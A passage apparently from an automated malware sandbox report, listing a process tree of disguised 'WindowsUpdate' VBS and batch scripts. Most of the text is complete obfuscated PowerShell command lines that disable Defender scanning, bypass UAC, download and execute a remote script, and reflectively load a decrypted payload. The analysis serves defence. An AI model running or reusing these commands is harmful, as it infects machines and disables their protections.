zX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRid2p2cGFqcnB1d2R2a2h2ZW90eXZhc2xiPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGI9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRnbm5icmFkeXV6emFpY3F6amdvdWx3dmRhPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJGJ3anZwYWpycHV3ZHZraHZlb3R5dmFzbGIsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuQ29weVRvKCRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuRGlzcG9zZSgpOwkkYndqdnBhanJwdXdkdmtodmVvdHl2YXNsYi5EaXNwb3NlKCk7CSRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiLkRpc3Bvc2UoKTsJJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGIuVG9BcnJheSgpO31mdW5jdGlvbiBxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckbGJwYnNmYnhoZ3FrdHh2amxudHJ4Yndta3pmbHFwa3NqYmZ6b3didT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2PSRsYnBic2ZieGhncWt0eHZqbG50cnhid21remZscXBrc2piZnpvd2J1LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2LkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kcW1ka3hmZndnbGliZXJiZWl1eGFvZnJnbyA9ICRlbnY6VVNFUk5BTUU7JG1scXhnYmJ4cnl1dnR6c29lY3ZmcWl5enQgPSAnQzpcVXNlcnNcJyArICRxbWRreGZmd2dsaWJlcmJlaXV4YW9mcmdvICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbWxxeGdiYnhyeXV2dHpzb2VjdmZxaXl6dDskdWR5eHI9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRtbHF4Z2JieHJ5dXZ0enNvZWN2ZnFpeXp0KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkeWRhIGluICR1ZHl4cikgewlpZiAoJHlkYS5TdGFydHNXaXRoKCc6OicpKQl7CQkkZG5xZWw9JHlkYS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kdnRzcHN1bmViZWl0bXlzbHNnamhqemFncz1bc3RyaW5nW11dJGRucWVsLlNwbGl0KCdcJyk7SUVYICckcHpvY2V4eW52bmh0dG9jd3NuenhlY25xcD1pYnB4Z21oanR3a2Jnem4gKHlsY2Z4ZmV0ZHdqc2RpciAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCR2dHNwc3VuZWJlaXRteXNsc2dqaGp6YWdzWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGs9aWJweGdtaGp0d2tiZ3puICh5bGNmeGZldGR3anNkaXIgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkdnRzcHN1bmViZWl0bXlzbHNnamhqemFnc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuICRwem9jZXh5bnZuaHR0b2N3c256eGVjbnFwICRudWxsO3FtYWlubW14bnpheHpocm9od2xoeHBwcm4gJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGsgKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • WerFault.exe (PID: 7324 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 3336 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 1964 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_87.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 3332 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3144 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5044 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRid2p2cGFqcnB1d2R2a2h2ZW90eXZhc2xiPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGI9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRnbm5icmFkeXV6emFpY3F6amdvdWx3dmRhPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJGJ3anZwYWpycHV3ZHZraHZlb3R5dmFzbGIsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuQ29weVRvKCRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuRGlzcG9zZSgpOwkkYndqdnBhanJwdXdkdmtodmVvdHl2YXNsYi5EaXNwb3NlKCk7CSRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiLkRpc3Bvc2UoKTsJJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGIuVG9BcnJheSgpO31mdW5jdGlvbiBxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckbGJwYnNmYnhoZ3FrdHh2amxudHJ4Yndta3pmbHFwa3NqYmZ6b3didT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2PSRsYnBic2ZieGhncWt0eHZqbG50cnhid21remZscXBrc2piZnpvd2J1LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2LkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kcW1ka3hmZndnbGliZXJiZWl1eGFvZnJnbyA9ICRlbnY6VVNFUk5BTUU7JG1scXhnYmJ4cnl1dnR6c29lY3ZmcWl5enQgPSAnQzpcVXNlcnNcJyArICRxbWRreGZmd2dsaWJlcmJlaXV4YW9mcmdvICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbWxxeGdiYnhyeXV2dHpzb2VjdmZxaXl6dDskdWR5eHI9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRtbHF4Z2JieHJ5dXZ0enNvZWN2ZnFpeXp0KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkeWRhIGluICR1ZHl4cikgewlpZiAoJHlkYS5TdGFydHNXaXRoKCc6OicpKQl7CQkkZG5xZWw9JHlkYS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kdnRzcHN1bmViZWl0bXlzbHNnamhqemFncz1bc3RyaW5nW11dJGRucWVsLlNwbGl0KCdcJyk7SUVYICckcHpvY2V4eW52bmh0dG9jd3NuenhlY25xcD1pYnB4Z21oanR3a2Jnem4gKHlsY2Z4ZmV0ZHdqc2RpciAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCR2dHNwc3VuZWJlaXRteXNsc2dqaGp6YWdzWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGs9aWJweGdtaGp0d2tiZ3puICh5bGNmeGZldGR3anNkaXIgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkdnRzcHN1bmViZWl0bXlzbHNnamhqemFnc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuICRwem9jZXh5bnZuaHR0b2N3c256eGVjbnFwICRudWxsO3FtYWlubW14bnpheHpocm9od2xoeHBwcm4gJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGsgKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • wscript.exe (PID: 1088 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_412.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7916 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1200 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5332 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRid2p2cGFqcnB1d2R2a2h2ZW90eXZhc2xiPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGI9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRnbm5icmFkeXV6emFpY3F6amdvdWx3dmRhPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJGJ3anZwYWpycHV3ZHZraHZlb3R5dmFzbGIsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuQ29weVRvKCRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuRGlzcG9zZSgpOwkkYndqdnBhanJwdXdkdmtodmVvdHl2YXNsYi5EaXNwb3NlKCk7CSRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiLkRpc3Bvc2UoKTsJJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGIuVG9BcnJheSgpO31mdW5jdGlvbiBxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckbGJwYnNmYnhoZ3FrdHh2amxudHJ4Yndta3pmbHFwa3NqYmZ6b3didT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2PSRsYnBic2ZieGhncWt0eHZqbG50cnhid21remZscXBrc2piZnpvd2J1LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2LkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kcW1k